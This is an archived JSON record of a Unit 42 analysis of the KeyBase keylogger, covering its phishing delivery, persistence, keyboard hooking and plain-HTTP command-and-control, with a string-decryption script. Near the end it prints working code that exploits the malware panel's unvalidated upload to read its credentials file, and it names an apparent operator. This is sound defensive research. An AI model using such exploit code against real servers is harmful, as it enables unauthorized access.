{
	"id": "8a9c3eff-7a9d-4b31-ab4d-10b4c6e241b1",
	"created_at": "2026-04-06T00:22:01.0707Z",
	"updated_at": "2026-04-10T13:12:21.855578Z",
	"deleted_at": null,
	"sha1_hash": "5d5f50c25e774450cc0fb0ef6ed3d844988ac307",
	"title": "KeyBase Keylogger Malware Family Exposed",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2366941,
	"plain_text": "KeyBase Keylogger Malware Family Exposed\r\nBy Unit 42\r\nPublished: 2015-06-04 · Archived: 2026-04-05 17:51:42 UTC\r\nIn recent months, our team has been tracking a keylogger malware family named KeyBase that has been in the\r\nwild since February 2015. The malware comes equipped with a variety of features and can be purchased for $50\r\ndirectly from the author. It has been deployed in attacks against organizations across many industries and is\r\npredominantly delivered via phishing emails.\r\nIn total, Palo Alto Networks AutoFocus threat intelligence service identified 295 unique samples over roughly\r\n1,500 unique sessions in the past four months. Attacks have primarily targeted the high tech, higher education, and\r\nretail industries.\r\nMalware Distribution and Targets\r\nKeyBase was first observed in mid-February of 2015. Shortly before then, the domain ‘keybase[.]in’,  was\r\nregistered as a homepage and online store for the KeyBase keylogger.\r\nDomain Name:KEYBASE.IN\r\nCreated On:04-Feb-2015 08:27:44 UTC\r\nLast Updated On:05-Apr-2015 19:20:38 UTC\r\nExpiration Date:04-Feb-2016 08:27:44 UTC\r\nThis activity is in-line with an initial posting made by a user with the handle ‘Support™’ announcing KeyBase on\r\nthe hackforums.net forum on February 7, 2015. In the forum post, the malware touts the following features:\r\nAdvanced Keylogger\r\nFully undetected scan-time and run-time (Later removed)\r\nUser-friendly web-panel\r\nUnicode support\r\nPassword recovery\r\nFigure 1. KeyBase posting on hackforums.net\r\nhttps://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/\r\nPage 1 of 15\n\nSince February 2015, approximately 1,500 sessions carrying KeyBase have been captured by WildFire, as we can\r\nsee below:\r\nFigure 2. KeyBase timeline in AutoFocus\r\nWe can also quickly determine targeted industries using AutoFocus:\r\nFigure 3. Targeted industries in AutoFocus\r\nThe targeted companies span the globe and are located in many countries.\r\nFigure 4. Targeted countries in AutoFocus\r\nThis malware is primarily delivered via phishing emails using common lures. Some examples of attachment\r\nfilenames can be seen below:\r\nPurchase Order.exe\r\nNew Order.exe\r\nDocument 27895.scr\r\nPayment document.exe\r\nhttps://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/\r\nPage 2 of 15\n\nPO #7478.exe\r\nOverdue Invoices.exe\r\nOne such example of an email delivering KeyBase can be seen below.\r\nFigure 5. KeyBase phishing email\r\nOverall, Unit 42 has seen a large number of separate campaigns using KeyBase. As the software can be easily\r\npurchased by anyone, this comes as no surprise. As we can see in the following diagram, around 50 different\r\ncommand and control (C2) servers have been identified with up to as many as 50 unique samples connecting to a\r\nsingle C2.\r\nhttps://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/\r\nPage 3 of 15\n\nFigure 6. KeyBase campaign diagram\r\nMalware Overview\r\nKeyBase itself is written in C# using the .NET Framework. These facts allowed us to decompile the underlying\r\ncode and identify key functionality and characteristics of the keylogger.\r\nFigure 7. KeyBase logo\r\nFunctionality in KeyBase includes the following:\r\nhttps://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/\r\nPage 4 of 15\n\nDisplay a website on startup\r\nScreenshots\r\nDownload/Execute\r\nPersistence\r\nKill Timer\r\nWhen the malware is initially executed, a series of threads are spawned.\r\nFigure 8. KeyBase main function\r\nThe various functions spawned in new threads may be inert based on options specified by the attacker during the\r\nbuild. Should a feature not be enabled, a function looks similar to the following:\r\nhttps://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/\r\nPage 5 of 15\n\nFigure 9. Inert functions in KeyBase\r\nFigure 10. KeyBase builder\r\nThe author makes use of a number of simple obfuscation techniques on various strings used within the code.\r\nExamples of this include replacing single characters that have been added to strings, as well as performing reverse\r\noperations on strings.\r\nFigure 11. String obfuscation using replace\r\nhttps://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/\r\nPage 6 of 15\n\nFigure 12. String obfuscation using reverse\r\nAdditionally, the author makes use of an ‘Encryption’ class. This class is used to decrypt a number of strings\r\nfound within the code.\r\nFigure 13. KeyBase Encryption class\r\nReferences to this decompiled code were discovered in an old posting on hackforums.net, where the user\r\n‘Ethereal’ provided sample code.\r\nhttps://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/\r\nPage 7 of 15\n\nFigure 14. Encryption code posting on hackforums.net\r\nWe see the ‘DecryptText’ function used by the author when he/she dynamically loads a number of Microsoft\r\nWindows APIs.\r\nFigure 15. Obfuscated API functions in KeyBase\r\nThe following Python code can be used to decrypt these strings.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\nstrings = [ u\"ĈőŘĝŏŒįķŎŖġŎŠĠz\", \\\r\n            u\"ŝƕƸšƔưƕŷƔƇżƚƲƕƎƤË\", \\\r\n            u\"ķůƒĻŮƊůőŮšŖŴƌůŨž¥\", \\\r\n            u\"ńŰƓļůƋŰŒůŢŗŵƍŰũſ¦\", \\\r\n            u\"ŨƚƶľśƌƐƅſƧźƌƚƏŔƚƭżƌƱƟÆ\", \\\r\n            u\"ĴšűĽňżūŅšƃŌŅůũőŮƉ\\u0097\", \\\r\n            u\"ŇżƇśūŨżşŭƃŚŹťůŝŹƐŠ¥\", \\\r\n            u\"ıűŦňŦŬŭĹŦŶőňűŐňŠƅŃŨŹ\\u0098\", \\\r\nhttps://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/\r\nPage 8 of 15\n\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n            u\"ńűƎřŹŷŴįŴƈŔŧśƀ£\", \\\r\n            u\"ŵƢDŽƏƦưƑƋƯƶŻƝØ\" ]\r\nkey = 'KeyBase'\r\ndef dec(str, key):\r\nkey_len = len(key)\r\nout = \"\"\r\nfor c, s in enumerate(str[:-1]):\r\nout += chr(ord(s) - ord(key[c%key_len]) - ord(str[-1]))\r\nreturn out\r\nfor s in strings:\r\nprint \"Decoded: %25s  |  Encoded: %s\" % (dec(s, key), repr(s))\r\nPersistence\r\nPersistence in KeyBase, should it be enabled, is achieved using two techniques—copying the malware to the\r\nstartup folder or setting the Run registry key to autorun on startup. When KeyBase copies itself to the startup\r\nfolder, it names itself ‘Important.exe.’ This is statically set by the author and cannot be changed by the user in the\r\ncurrent version. The key used in the following Run registry key is set by the user, and is always a 32 byte\r\nhexadecimal value.\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run [32 byte key] : [Path to Executable]\r\nKeylogging\r\nKeylogging in KeyBase is primarily accomplished in a separate class appropriately named ‘KeyHook.’ While the\r\nclass shares a name with a publicly available repository on github, the class appears to be custom written. While\r\ncustom, the class itself uses a very common technique of using the Microsoft Windows SetWindowsHookExA in\r\norder to hook the victim’s keyboard.\r\nhttps://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/\r\nPage 9 of 15\n\nFigure 16. Hooking keyboard via SetWindowsHookExA\r\nThe author proceeds to handle appropriate keyboard events as expected.\r\nFigure 17. Handling keyboard events\r\nThe class also has the ability to handle Unicode characters, as well as get the name of the foreground window.\r\nThis allows the malware to not only identify what keys are being pressed, but what application said key presses\r\nare being sent to.\r\nCommand and Control (C2)\r\nAll communication with a remote server takes place via HTTP. Data is not encrypted or obfuscated in any way.\r\nUpon initial execution, KeyBase will perform an initial check-in to the remote server, as we can see below.\r\n \r\nFigure 18. Initial KeyBase notification HTTP GET request\r\nhttps://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/\r\nPage 10 of 15\n\nA number of HTTP headers are not included with the request. This provides a simple technique for flagging the\r\nactivity as malicious. It is also important to note that it is fairly elementary to detect the activity using the\r\nhardcoded GET variables included in the request. While the victim machine name and the current time will vary,\r\nthe remainder of the request will remain static.\r\nKeyBase may also send the following data back to its C2 server:\r\nKeystrokes\r\nClipboard\r\nScreenshots\r\nExamples of this data can be seen below.\r\nFigure 19. KeyBase uploading clipboard data\r\nFigure 20. KeyBase uploading keystroke data\r\nDuring this communication with its C2 server, KeyBase will include the raw clipboard and keystroke log data\r\nusing various GET parameters. This data is URI-encoded, but otherwise sent in the clear.\r\nFinally, Keybase will also use a specific URI to upload screenshots. The path ‘/image/upload.php’ is hardcoded\r\nwithin the malware. All images sent back to its C2 server will be placed within the ‘/image/Images/’ path.\r\nUploaded data is once again sent unencrypted, as we can see below.\r\nFigure 21. KeyBase uploading screenshot image\r\nWeb Panel\r\nThe web panel itself does not provide any innovative characteristics. It uses a simple red/grey color scheme as\r\nseen below.\r\nhttps://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/\r\nPage 11 of 15\n\nFigure 22. KeyBase web panel\r\nThe panel does allow the attacker to quickly view infected machines, keystrokes, screenshots, clipboard data, and\r\npassword data. Unfortunately, the author of KeyBase does not make use of pagination, which results in poor\r\nperformance in the event a large amount of data is being displayed to the attacker.\r\nInteresting Discoveries\r\nDuring the course of our research, Unit 42 discovered that no authentication was required when viewing the\r\n‘/image/Images/’ path. One C2 server in particular stood out because it appeared the operator was testing KeyBase\r\non his/her local machine. As such, screenshots of his machine were uploaded to his server and could be viewed by\r\nthe general public. In the screenshot below, we can clearly see the ‘KeyBase v1.0’ folder. This folder almost\r\ncertainly contains the KeyBase installation. While viewing the operator’s desktop, we can also see a number of\r\nother keyloggers, such as ‘HawkEye Keylogger’ and ‘Knight Logger’. Also of note is a popular crypter named\r\n‘AegisCrypter’. Finally, we can also see that the user engages in piracy, as copies of both ‘The Hobbit’ and ‘Fury’\r\nappear on the desktop as well.\r\nFigure 23. KeyBase operator desktop screenshot\r\nhttps://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/\r\nPage 12 of 15\n\nWhile continuing to examine the uploaded images, we also identify the user logging into a Windows Web Server\r\n2008 R2 instance via remote desktop. This appears to be where the attacker is launching their spam campaigns\r\nusing an instance of ‘Turbo-Mailer 2.7.10’. Unfortunately, it appears the operator had forgotten his/her\r\nusername/password at this particular moment.\r\nFigure 24. KeyBase operator sending phishing emails\r\nFurther examination of the uploaded screenshots shows activity of the user logging into his/her Facebook account.\r\nThe user looks to be named ‘China Onyeali’ and is observed discussing some of his/her latest endeavors.\r\nSpecifically, we see a link to a .rar file hosted on rghost[.]net containing the following file. We also see the\r\noperator discussing the HawkEye keylogger in another chat window. The operator’s Facebook page claims that\r\nhe/she lives in Mbieri, Nigeria. We previously reported on Nigerian actors using off-the-shelf tools to attack\r\nbusiness in our 419 Evolution report last July. This user has been reported to the Facebook security team.\r\nFigure 25. KeyBase operator logged into Facebook\r\nFurther Interesting Discoveries\r\nhttps://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/\r\nPage 13 of 15\n\nOther interesting discoveries were made while researching the backend C2 code. In particular, the upload.php file\r\nwas examined and analyzed, as this file handles file uploads to the server. As we can see, there is no validation for\r\nthe types of files uploaded to the remote server.\r\nFigure 26. KeyBase screenshot upload PHP script\r\nThis poses an issue from a security perspective, as a third party can simply upload a PHP script to the\r\n‘/image/Images/’ directory to gain unauthorized access. The following PHP code can be used to read the KeyBase\r\n‘config.php’ script, which contains the username and password for the web panel.\r\n\u003c?php\r\n$file = '../../config.php';\r\necho \"It works!\".\"\u003c/br\u003e\";\r\nif (file_exists($file)) {\r\necho \"Reading file\".\"\u003c/br\u003e\";\r\necho file_get_contents($file);\r\n}\r\n?\u003e\r\nAdditionally, the following Python code can be used to upload this file and read the results.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\nimport requests\r\nimport sys\r\nif len(sys.argv) != 2:\r\nprint \"Usage: %s [php_file]\" % __file__\r\nsys.exit(1)\r\nURL = \"\"\r\nhttps://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/\r\nPage 14 of 15\n\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\nprint \"Sending request...\"\r\nmultiple_files = [('file', ('WIN-JJFOIJGL_6_5_14_22_2.php', open(sys.argv[1], 'rb')))]\r\nr = requests.post(URL + \"image/upload.php\", files=multiple_files)\r\nprint \"Results:\"\r\nprint\r\nr = requests.get(URL + \"image/Images/WIN-JJFOIJGL_6_5_14_22_2.php\")\r\nprint r.text\r\nConclusion\r\nOverall, this KeyBase malware is quite unsophisticated. It lacks a number of features available in some of the\r\nmore popular malware families, and the C2 web panel contains security vulnerabilities that could allow a third\r\nparty to gain unauthorized access. The builder for KeyBase provides an easy-to-use, user-friendly interface;\r\nhowever, a number of options are hardcoded into the malware itself. Some examples include the filename\r\nKeyBase uses when it is copied to maintain persistence, and various URI paths it uses during the command and\r\ncontrol phase.\r\nWhile this malware has some issues with sophistication, Unit 42 has observed a significant and continued rise in\r\nusage by attackers, generally targeting the high tech, higher education, and retail industries. Palo Alto Networks\r\ncustomers are protected via WildFire, which is able to detect KeyBase as malicious. Readers may also use the\r\nindicators provided to deploy protections.\r\nFor a list of sample hashes and their associated domains and IP addresses, please see the following link.\r\nSource: https://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/\r\nhttps://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/\r\nPage 15 of 15",
	"extraction_quality": 1,
	"language": "ES",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/"
	],
	"report_names": [
		"keybase-keylogger-malware-family-exposed"
	],
	"threat_actors": [],
	"ts_created_at": 1775434921,
	"ts_updated_at": 1775826741,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5d5f50c25e774450cc0fb0ef6ed3d844988ac307.pdf",
		"text": "https://archive.orkl.eu/5d5f50c25e774450cc0fb0ef6ed3d844988ac307.txt",
		"img": "https://archive.orkl.eu/5d5f50c25e774450cc0fb0ef6ed3d844988ac307.jpg"
	}
}